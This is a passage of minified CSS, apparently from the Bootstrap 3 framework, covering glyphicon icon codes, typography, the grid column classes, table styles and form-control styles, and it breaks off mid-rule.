glyphicon-leaf:before{content:"\e103"}.glyphicon-fire:before{content:"\e104"}.glyphicon-eye-open:before{content:"\e105"}.glyphicon-eye-close:before{content:"\e106"}.glyphicon-warning-sign:before{content:"\e107"}.glyphicon-plane:before{content:"\e108"}.glyphicon-calendar:before{content:"\e109"}.glyphicon-random:before{content:"\e110"}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\e117"}.glyphicon-folder-open:before{content:"\e118"}.glyphicon-resize-vertical:before{content:"\e119"}.glyphicon-resize-horizontal:before{content:"\e120"}.glyphicon-hdd:before{content:"\e121"}.glyphicon-bullhorn:before{content:"\e122"}.glyphicon-bell:before{content:"\e123"}.glyphicon-certificate:before{content:"\e124"}.glyphicon-thumbs-up:before{content:"\e125"}.glyphicon-thumbs-down:before{content:"\e126"}.glyphicon-hand-right:before{content:"\e127"}.glyphicon-hand-left:before{content:"\e128"}.glyphicon-hand-up:before{content:"\e129"}.glyphicon-hand-down:before{content:"\e130"}.glyphicon-circle-arrow-right:before{content:"\e131"}.glyphicon-circle-arrow-left:before{content:"\e132"}.glyphicon-circle-arrow-up:before{content:"\e133"}.glyphicon-circle-arrow-down:before{content:"\e134"}.glyphicon-globe:before{content:"\e135"}.glyphicon-wrench:before{content:"\e136"}.glyphicon-tasks:before{content:"\e137"}.glyphicon-filter:before{content:"\e138"}.glyphicon-briefcase:before{content:"\e139"}.glyphicon-fullscreen:before{content:"\e140"}.glyphicon-dashboard:before{content:"\e141"}.glyphicon-paperclip:before{content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-pushpin:before{content:"\e146"}.glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e149"}.glyphicon-sort:before{content:"\e150"}.glyphicon-sort-by-alphabet:before{content:"\e151"}.glyphicon-sort-by-alphabet-alt:before{content:"\e152"}.glyphicon-sort-by-order:before{content:"\e153"}.glyphicon-sort-by-order-alt:before{content:"\e154"}.glyphicon-sort-by-attributes:before{content:"\e155"}.glyphicon-sort-by-attributes-alt:before{content:"\e156"}.glyphicon-unchecked:before{content:"\e157"}.glyphicon-expand:before{content:"\e158"}.glyphicon-collapse-down:before{content:"\e159"}.glyphicon-collapse-up:before{content:"\e160"}.glyphicon-log-in:before{content:"\e161"}.glyphicon-flash:before{content:"\e162"}.glyphicon-log-out:before{content:"\e163"}.glyphicon-new-window:before{content:"\e164"}.glyphicon-record:before{content:"\e165"}.glyphicon-save:before{content:"\e166"}.glyphicon-open:before{content:"\e167"}.glyphicon-saved:before{content:"\e168"}.glyphicon-import:before{content:"\e169"}.glyphicon-export:before{content:"\e170"}.glyphicon-send:before{content:"\e171"}.glyphicon-floppy-disk:before{content:"\e172"}.glyphicon-floppy-saved:before{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphicon-cutlery:before{content:"\e179"}.glyphicon-header:before{content:"\e180"}.glyphicon-compressed:before{content:"\e181"}.glyphicon-earphone:before{content:"\e182"}.glyphicon-phone-alt:before{content:"\e183"}.glyphicon-tower:before{content:"\e184"}.glyphicon-stats:before{content:"\e185"}.glyphicon-sd-video:before{content:"\e186"}.glyphicon-hd-video:before{content:"\e187"}.glyphicon-subtitles:before{content:"\e188"}.glyphicon-sound-stereo:before{content:"\e189"}.glyphicon-sound-dolby:before{content:"\e190"}.glyphicon-sound-5-1:before{content:"\e191"}.glyphicon-sound-6-1:before{content:"\e192"}.glyphicon-sound-7-1:before{content:"\e193"}.glyphicon-copyright-mark:before{content:"\e194"}.glyphicon-registration-mark:before{content:"\e195"}.glyphicon-cloud-download:before{content:"\e197"}.glyphicon-cloud-upload:before{content:"\e198"}.glyphicon-tree-conifer:before{content:"\e199"}.glyphicon-tree-deciduous:before{content:"\e200"}.glyphicon-cd:before{content:"\e201"}.glyphicon-save-file:before{content:"\e202"}.glyphicon-open-file:before{content:"\e203"}.glyphicon-level-up:before{content:"\e204"}.glyphicon-copy:before{content:"\e205"}.glyphicon-paste:before{content:"\e206"}.glyphicon-alert:before{content:"\e209"}.glyphicon-equalizer:before{content:"\e210"}.glyphicon-king:before{content:"\e211"}.glyphicon-queen:before{content:"\e212"}.glyphicon-pawn:before{content:"\e213"}.glyphicon-bishop:before{content:"\e214"}.glyphicon-knight:before{content:"\e215"}.glyphicon-baby-formula:before{content:"\e216"}.glyphicon-tent:before{content:"\26fa"}.glyphicon-blackboard:before{content:"\e218"}.glyphicon-bed:before{content:"\e219"}.glyphicon-apple:before{content:"\f8ff"}.glyphicon-erase:before{content:"\e221"}.glyphicon-hourglass:before{content:"\231b"}.glyphicon-lamp:before{content:"\e223"}.glyphicon-duplicate:before{content:"\e224"}.glyphicon-piggy-bank:before{content:"\e225"}.glyphicon-scissors:before{content:"\e226"}.glyphicon-bitcoin:before{content:"\e227"}.glyphicon-btc:before{content:"\e227"}.glyphicon-xbt:before{content:"\e227"}.glyphicon-yen:before{content:"\00a5"}.glyphicon-jpy:before{content:"\00a5"}.glyphicon-ruble:before{content:"\20bd"}.glyphicon-rub:before{content:"\20bd"}.glyphicon-scale:before{content:"\e230"}.glyphicon-ice-lolly:before{content:"\e231"}.glyphicon-ice-lolly-tasted:before{content:"\e232"}.glyphicon-education:before{content:"\e233"}.glyphicon-option-horizontal:before{content:"\e234"}.glyphicon-option-vertical:before{content:"\e235"}.glyphicon-menu-hamburger:before{content:"\e236"}.glyphicon-modal-window:before{content:"\e237"}.glyphicon-oil:before{content:"\e238"}.glyphicon-grain:before{content:"\e239"}.glyphicon-sunglasses:before{content:"\e240"}.glyphicon-text-size:before{content:"\e241"}.glyphicon-text-color:before{content:"\e242"}.glyphicon-text-background:before{content:"\e243"}.glyphicon-object-align-top:before{content:"\e244"}.glyphicon-object-align-bottom:before{content:"\e245"}.glyphicon-object-align-horizontal:before{content:"\e246"}.glyphicon-object-align-left:before{content:"\e247"}.glyphicon-object-align-vertical:before{content:"\e248"}.glyphicon-object-align-right:before{content:"\e249"}.glyphicon-triangle-right:before{content:"\e250"}.glyphicon-triangle-left:before{content:"\e251"}.glyphicon-triangle-bottom:before{content:"\e252"}.glyphicon-triangle-top:before{content:"\e253"}.glyphicon-console:before{content:"\e254"}.glyphicon-superscript:before{content:"\e255"}.glyphicon-subscript:before{content:"\e256"}.glyphicon-menu-left:before{content:"\e257"}.glyphicon-menu-right:before{content:"\e258"}.glyphicon-menu-down:before{content:"\e259"}.glyphicon-menu-up:before{content:"\e260"}*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:10px;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.42857143;color:#333;background-color:#fff}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#337ab7;text-decoration:none}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}figure{margin:0}img{vertical-align:middle}.carousel-inner>.item>a>img,.carousel-inner>.item>img,.img-responsive,.thumbnail a>img,.thumbnail>img{display:block;max-width:100%;height:auto}.img-rounded{border-radius:6px}.img-thumbnail{display:inline-block;max-width:100%;height:auto;padding:4px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.img-circle{border-radius:50%}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}[role=button]{cursor:pointer}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}.h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,.h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-weight:400;line-height:1;color:#777}.h1,.h2,.h3,h1,h2,h3{margin-top:20px;margin-bottom:10px}.h1 .small,.h1 small,.h2 .small,.h2 small,.h3 .small,.h3 small,h1 .small,h1 small,h2 .small,h2 small,h3 .small,h3 small{font-size:65%}.h4,.h5,.h6,h4,h5,h6{margin-top:10px;margin-bottom:10px}.h4 .small,.h4 small,.h5 .small,.h5 small,.h6 .small,.h6 small,h4 .small,h4 small,h5 .small,h5 small,h6 .small,h6 small{font-size:75%}.h1,h1{font-size:36px}.h2,h2{font-size:30px}.h3,h3{font-size:24px}.h4,h4{font-size:18px}.h5,h5{font-size:14px}.h6,h6{font-size:12px}p{margin:0 0 10px}.lead{margin-bottom:20px;font-size:16px;font-weight:300;line-height:1.4}@media (min-width:768px){.lead{font-size:21px}}.small,small{font-size:85%}.mark,mark{padding:.2em;background-color:#fcf8e3}.text-left{text-align:left}.text-right{text-align:right}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}.text-muted{color:#777}.text-primary{color:#337ab7}a.text-primary:focus,a.text-primary:hover{color:#286090}.text-success{color:#3c763d}a.text-success:focus,a.text-success:hover{color:#2b542c}.text-info{color:#31708f}a.text-info:focus,a.text-info:hover{color:#245269}.text-warning{color:#8a6d3b}a.text-warning:focus,a.text-warning:hover{color:#66512c}.text-danger{color:#a94442}a.text-danger:focus,a.text-danger:hover{color:#843534}.bg-primary{color:#fff;background-color:#337ab7}a.bg-primary:focus,a.bg-primary:hover{background-color:#286090}.bg-success{background-color:#dff0d8}a.bg-success:focus,a.bg-success:hover{background-color:#c1e2b3}.bg-info{background-color:#d9edf7}a.bg-info:focus,a.bg-info:hover{background-color:#afd9ee}.bg-warning{background-color:#fcf8e3}a.bg-warning:focus,a.bg-warning:hover{background-color:#f7ecb5}.bg-danger{background-color:#f2dede}a.bg-danger:focus,a.bg-danger:hover{background-color:#e4b9b9}.page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}ol,ul{margin-top:0;margin-bottom:10px}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;margin-left:-5px;list-style:none}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}dl{margin-top:0;margin-bottom:20px}dd,dt{line-height:1.42857143}dt{font-weight:700}dd{margin-left:0}@media (min-width:768px){.dl-horizontal dt{float:left;width:160px;overflow:hidden;clear:left;text-align:right;text-overflow:ellipsis;white-space:nowrap}.dl-horizontal dd{margin-left:180px}}abbr[data-original-title],abbr[title]{cursor:help;border-bottom:1px dotted #777}.initialism{font-size:90%;text-transform:uppercase}blockquote{padding:10px 20px;margin:0 0 20px;font-size:17.5px;border-left:5px solid #eee}blockquote ol:last-child,blockquote p:last-child,blockquote ul:last-child{margin-bottom:0}blockquote .small,blockquote footer,blockquote small{display:block;font-size:80%;line-height:1.42857143;color:#777}blockquote .small:before,blockquote footer:before,blockquote small:before{content:'\2014 \00A0'}.blockquote-reverse,blockquote.pull-right{padding-right:15px;padding-left:0;text-align:right;border-right:5px solid #eee;border-left:0}.blockquote-reverse .small:before,.blockquote-reverse footer:before,.blockquote-reverse small:before,blockquote.pull-right .small:before,blockquote.pull-right footer:before,blockquote.pull-right small:before{content:''}.blockquote-reverse .small:after,.blockquote-reverse footer:after,.blockquote-reverse small:after,blockquote.pull-right .small:after,blockquote.pull-right footer:after,blockquote.pull-right small:after{content:'\00A0 \2014'}address{margin-bottom:20px;font-style:normal;line-height:1.42857143}code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;background-color:#f9f2f4;border-radius:4px}kbd{padding:2px 4px;font-size:90%;color:#fff;background-color:#333;border-radius:3px;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.25);box-shadow:inset 0 -1px 0 rgba(0,0,0,.25)}kbd kbd{padding:0;font-size:100%;font-weight:700;-webkit-box-shadow:none;box-shadow:none}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.42857143;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}pre code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border-radius:0}.pre-scrollable{max-height:340px;overflow-y:scroll}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:768px){.container{width:750px}}@media (min-width:992px){.container{width:970px}}@media (min-width:1200px){.container{width:1170px}}.container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.row{margin-right:-15px;margin-left:-15px}.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{float:left}.col-xs-12{width:100%}.col-xs-11{width:91.66666667%}.col-xs-10{width:83.33333333%}.col-xs-9{width:75%}.col-xs-8{width:66.66666667%}.col-xs-7{width:58.33333333%}.col-xs-6{width:50%}.col-xs-5{width:41.66666667%}.col-xs-4{width:33.33333333%}.col-xs-3{width:25%}.col-xs-2{width:16.66666667%}.col-xs-1{width:8.33333333%}.col-xs-pull-12{right:100%}.col-xs-pull-11{right:91.66666667%}.col-xs-pull-10{right:83.33333333%}.col-xs-pull-9{right:75%}.col-xs-pull-8{right:66.66666667%}.col-xs-pull-7{right:58.33333333%}.col-xs-pull-6{right:50%}.col-xs-pull-5{right:41.66666667%}.col-xs-pull-4{right:33.33333333%}.col-xs-pull-3{right:25%}.col-xs-pull-2{right:16.66666667%}.col-xs-pull-1{right:8.33333333%}.col-xs-pull-0{right:auto}.col-xs-push-12{left:100%}.col-xs-push-11{left:91.66666667%}.col-xs-push-10{left:83.33333333%}.col-xs-push-9{left:75%}.col-xs-push-8{left:66.66666667%}.col-xs-push-7{left:58.33333333%}.col-xs-push-6{left:50%}.col-xs-push-5{left:41.66666667%}.col-xs-push-4{left:33.33333333%}.col-xs-push-3{left:25%}.col-xs-push-2{left:16.66666667%}.col-xs-push-1{left:8.33333333%}.col-xs-push-0{left:auto}.col-xs-offset-12{margin-left:100%}.col-xs-offset-11{margin-left:91.66666667%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-0{margin-left:0}@media (min-width:768px){.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9{float:left}.col-sm-12{width:100%}.col-sm-11{width:91.66666667%}.col-sm-10{width:83.33333333%}.col-sm-9{width:75%}.col-sm-8{width:66.66666667%}.col-sm-7{width:58.33333333%}.col-sm-6{width:50%}.col-sm-5{width:41.66666667%}.col-sm-4{width:33.33333333%}.col-sm-3{width:25%}.col-sm-2{width:16.66666667%}.col-sm-1{width:8.33333333%}.col-sm-pull-12{right:100%}.col-sm-pull-11{right:91.66666667%}.col-sm-pull-10{right:83.33333333%}.col-sm-pull-9{right:75%}.col-sm-pull-8{right:66.66666667%}.col-sm-pull-7{right:58.33333333%}.col-sm-pull-6{right:50%}.col-sm-pull-5{right:41.66666667%}.col-sm-pull-4{right:33.33333333%}.col-sm-pull-3{right:25%}.col-sm-pull-2{right:16.66666667%}.col-sm-pull-1{right:8.33333333%}.col-sm-pull-0{right:auto}.col-sm-push-12{left:100%}.col-sm-push-11{left:91.66666667%}.col-sm-push-10{left:83.33333333%}.col-sm-push-9{left:75%}.col-sm-push-8{left:66.66666667%}.col-sm-push-7{left:58.33333333%}.col-sm-push-6{left:50%}.col-sm-push-5{left:41.66666667%}.col-sm-push-4{left:33.33333333%}.col-sm-push-3{left:25%}.col-sm-push-2{left:16.66666667%}.col-sm-push-1{left:8.33333333%}.col-sm-push-0{left:auto}.col-sm-offset-12{margin-left:100%}.col-sm-offset-11{margin-left:91.66666667%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-0{margin-left:0}}@media (min-width:992px){.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9{float:left}.col-md-12{width:100%}.col-md-11{width:91.66666667%}.col-md-10{width:83.33333333%}.col-md-9{width:75%}.col-md-8{width:66.66666667%}.col-md-7{width:58.33333333%}.col-md-6{width:50%}.col-md-5{width:41.66666667%}.col-md-4{width:33.33333333%}.col-md-3{width:25%}.col-md-2{width:16.66666667%}.col-md-1{width:8.33333333%}.col-md-pull-12{right:100%}.col-md-pull-11{right:91.66666667%}.col-md-pull-10{right:83.33333333%}.col-md-pull-9{right:75%}.col-md-pull-8{right:66.66666667%}.col-md-pull-7{right:58.33333333%}.col-md-pull-6{right:50%}.col-md-pull-5{right:41.66666667%}.col-md-pull-4{right:33.33333333%}.col-md-pull-3{right:25%}.col-md-pull-2{right:16.66666667%}.col-md-pull-1{right:8.33333333%}.col-md-pull-0{right:auto}.col-md-push-12{left:100%}.col-md-push-11{left:91.66666667%}.col-md-push-10{left:83.33333333%}.col-md-push-9{left:75%}.col-md-push-8{left:66.66666667%}.col-md-push-7{left:58.33333333%}.col-md-push-6{left:50%}.col-md-push-5{left:41.66666667%}.col-md-push-4{left:33.33333333%}.col-md-push-3{left:25%}.col-md-push-2{left:16.66666667%}.col-md-push-1{left:8.33333333%}.col-md-push-0{left:auto}.col-md-offset-12{margin-left:100%}.col-md-offset-11{margin-left:91.66666667%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-9{margin-left:75%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-6{margin-left:50%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-3{margin-left:25%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-0{margin-left:0}}@media (min-width:1200px){.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9{float:left}.col-lg-12{width:100%}.col-lg-11{width:91.66666667%}.col-lg-10{width:83.33333333%}.col-lg-9{width:75%}.col-lg-8{width:66.66666667%}.col-lg-7{width:58.33333333%}.col-lg-6{width:50%}.col-lg-5{width:41.66666667%}.col-lg-4{width:33.33333333%}.col-lg-3{width:25%}.col-lg-2{width:16.66666667%}.col-lg-1{width:8.33333333%}.col-lg-pull-12{right:100%}.col-lg-pull-11{right:91.66666667%}.col-lg-pull-10{right:83.33333333%}.col-lg-pull-9{right:75%}.col-lg-pull-8{right:66.66666667%}.col-lg-pull-7{right:58.33333333%}.col-lg-pull-6{right:50%}.col-lg-pull-5{right:41.66666667%}.col-lg-pull-4{right:33.33333333%}.col-lg-pull-3{right:25%}.col-lg-pull-2{right:16.66666667%}.col-lg-pull-1{right:8.33333333%}.col-lg-pull-0{right:auto}.col-lg-push-12{left:100%}.col-lg-push-11{left:91.66666667%}.col-lg-push-10{left:83.33333333%}.col-lg-push-9{left:75%}.col-lg-push-8{left:66.66666667%}.col-lg-push-7{left:58.33333333%}.col-lg-push-6{left:50%}.col-lg-push-5{left:41.66666667%}.col-lg-push-4{left:33.33333333%}.col-lg-push-3{left:25%}.col-lg-push-2{left:16.66666667%}.col-lg-push-1{left:8.33333333%}.col-lg-push-0{left:auto}.col-lg-offset-12{margin-left:100%}.col-lg-offset-11{margin-left:91.66666667%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-0{margin-left:0}}table{background-color:transparent}caption{padding-top:8px;padding-bottom:8px;color:#777;text-align:left}th{text-align:left}.table{width:100%;max-width:100%;margin-bottom:20px}.table>tbody>tr>td,.table>tbody>tr>th,.table>tfoot>tr>td,.table>tfoot>tr>th,.table>thead>tr>td,.table>thead>tr>th{padding:8px;line-height:1.42857143;vertical-align:top;border-top:1px solid #ddd}.table>thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}.table>caption+thead>tr:first-child>td,.table>caption+thead>tr:first-child>th,.table>colgroup+thead>tr:first-child>td,.table>colgroup+thead>tr:first-child>th,.table>thead:first-child>tr:first-child>td,.table>thead:first-child>tr:first-child>th{border-top:0}.table>tbody+tbody{border-top:2px solid #ddd}.table .table{background-color:#fff}.table-condensed>tbody>tr>td,.table-condensed>tbody>tr>th,.table-condensed>tfoot>tr>td,.table-condensed>tfoot>tr>th,.table-condensed>thead>tr>td,.table-condensed>thead>tr>th{padding:5px}.table-bordered{border:1px solid #ddd}.table-bordered>tbody>tr>td,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>td,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border:1px solid #ddd}.table-bordered>thead>tr>td,.table-bordered>thead>tr>th{border-bottom-width:2px}.table-striped>tbody>tr:nth-of-type(odd){background-color:#f9f9f9}.table-hover>tbody>tr:hover{background-color:#f5f5f5}table col[class*=col-]{position:static;display:table-column;float:none}table td[class*=col-],table th[class*=col-]{position:static;display:table-cell;float:none}.table>tbody>tr.active>td,.table>tbody>tr.active>th,.table>tbody>tr>td.active,.table>tbody>tr>th.active,.table>tfoot>tr.active>td,.table>tfoot>tr.active>th,.table>tfoot>tr>td.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>thead>tr.active>th,.table>thead>tr>td.active,.table>thead>tr>th.active{background-color:#f5f5f5}.table-hover>tbody>tr.active:hover>td,.table-hover>tbody>tr.active:hover>th,.table-hover>tbody>tr:hover>.active,.table-hover>tbody>tr>td.active:hover,.table-hover>tbody>tr>th.active:hover{background-color:#e8e8e8}.table>tbody>tr.success>td,.table>tbody>tr.success>th,.table>tbody>tr>td.success,.table>tbody>tr>th.success,.table>tfoot>tr.success>td,.table>tfoot>tr.success>th,.table>tfoot>tr>td.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>thead>tr.success>th,.table>thead>tr>td.success,.table>thead>tr>th.success{background-color:#dff0d8}.table-hover>tbody>tr.success:hover>td,.table-hover>tbody>tr.success:hover>th,.table-hover>tbody>tr:hover>.success,.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover{background-color:#d0e9c6}.table>tbody>tr.info>td,.table>tbody>tr.info>th,.table>tbody>tr>td.info,.table>tbody>tr>th.info,.table>tfoot>tr.info>td,.table>tfoot>tr.info>th,.table>tfoot>tr>td.info,.table>tfoot>tr>th.info,.table>thead>tr.info>td,.table>thead>tr.info>th,.table>thead>tr>td.info,.table>thead>tr>th.info{background-color:#d9edf7}.table-hover>tbody>tr.info:hover>td,.table-hover>tbody>tr.info:hover>th,.table-hover>tbody>tr:hover>.info,.table-hover>tbody>tr>td.info:hover,.table-hover>tbody>tr>th.info:hover{background-color:#c4e3f3}.table>tbody>tr.warning>td,.table>tbody>tr.warning>th,.table>tbody>tr>td.warning,.table>tbody>tr>th.warning,.table>tfoot>tr.warning>td,.table>tfoot>tr.warning>th,.table>tfoot>tr>td.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>thead>tr.warning>th,.table>thead>tr>td.warning,.table>thead>tr>th.warning{background-color:#fcf8e3}.table-hover>tbody>tr.warning:hover>td,.table-hover>tbody>tr.warning:hover>th,.table-hover>tbody>tr:hover>.warning,.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover{background-color:#faf2cc}.table>tbody>tr.danger>td,.table>tbody>tr.danger>th,.table>tbody>tr>td.danger,.table>tbody>tr>th.danger,.table>tfoot>tr.danger>td,.table>tfoot>tr.danger>th,.table>tfoot>tr>td.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>thead>tr.danger>th,.table>thead>tr>td.danger,.table>thead>tr>th.danger{background-color:#f2dede}.table-hover>tbody>tr.danger:hover>td,.table-hover>tbody>tr.danger:hover>th,.table-hover>tbody>tr:hover>.danger,.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover{background-color:#ebcccc}.table-responsive{min-height:.01%;overflow-x:auto}@media screen and (max-width:767px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar;border:1px solid #ddd}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>td,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>thead>tr>th{white-space:nowrap}.table-responsive>.table-bordered{border:0}.table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}.table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}.table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>th{border-bottom:0}}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;max-width:100%;margin-bottom:5px;font-weight:700}input[type=search]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type=checkbox],input[type=radio]{margin:4px 0 0;margin-top:1px\9;line-height:normal}input[type=file]{display:block}input[type=range]{display:block;width:100%}select[multiple],select[size]{height:auto}input[type=file]:focus,input[type=checkbox]:focus,input[type=radio]:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}output{display:block;padding-top:7px;font-size:14px;line-height:1.42857143;color:#555}.form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075);-webkit-transition:border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;-o-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px 